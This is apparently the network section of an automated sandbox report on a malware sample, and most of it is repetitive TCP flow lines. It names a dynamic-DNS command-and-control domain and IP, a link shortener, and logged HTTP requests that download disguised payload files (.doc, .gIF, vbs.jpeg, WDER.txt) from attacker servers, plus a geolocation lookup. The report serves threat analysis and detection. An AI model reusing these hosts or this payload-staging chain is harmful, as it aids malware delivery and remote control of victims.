            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170
            Source: global trafficTCP traffic: 192.168.2.22:49170 -> 192.3.176.174:80
            Source: global trafficTCP traffic: 192.3.176.174:80 -> 192.168.2.22:49170

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: sembe.duckdns.org
            Uses dynamic DNS services
            Source: unknownDNS query: name: sembe.duckdns.org
            Source: global trafficTCP traffic: 192.168.2.22:49173 -> 194.187.251.115:14645
            Source: creatednewwaterbottleforme[1].gif.8.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
            Source: creatednewwaterbottleforme[1].gif.8.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
            Source: creatednewwaterbottleform.vBS.8.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
            Source: creatednewwaterbottleform.vBS.8.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
            Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /60/WDER.txt HTTP/1.1Host: 192.3.176.174Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: global trafficHTTP traffic detected: GET /sA HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.174Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /60/creatednewwaterbottleforme.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.174Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: unknownTCP traffic detected without corresponding DNS query: 192.3.176.174
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 12_2_0041B380 InternetOpenW,InternetOpenUrlW,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,12_2_0041B380
            Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1D0FB8B4.emfJump to behavior
            Source: global trafficHTTP traffic detected: GET /sA HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: tny.wtfConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /60/gbh/creamthingstohappenedgetmebackwithentirethingstogetbackeverythingtounderstandhowmuchpowerfulthingsitis__________wearegreatwithentirethingstobeback.doc HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.174Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /60/creatednewwaterbottleforme.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.176.174Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /60/WDER.txt HTTP/1.1Host: 192.3.176.174Connection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: tny.wtf
            Source: global trafficDNS traffic detected: DNS query: sembe.duckdns.org
            Source: global trafficDNS traffic detected: DNS query: geoplugin.net
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 26 Jul 2024 11:08:47 GMTTransfer-Encoding: chunkedConnection: keep-aliveX-Powered-By: ASP.NETCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jJElqVnUA8jKAx%2F3PmV0wFJdjDNyvn8deX5%2B0FMsEEFY2LgzOlpDDiWBEmqVoyPaex68lylLAgyk9nol7pY2Y03zAZpaFKvvz4cN800pE244OSTpBPUufyBF"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8a93ef0988077288-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
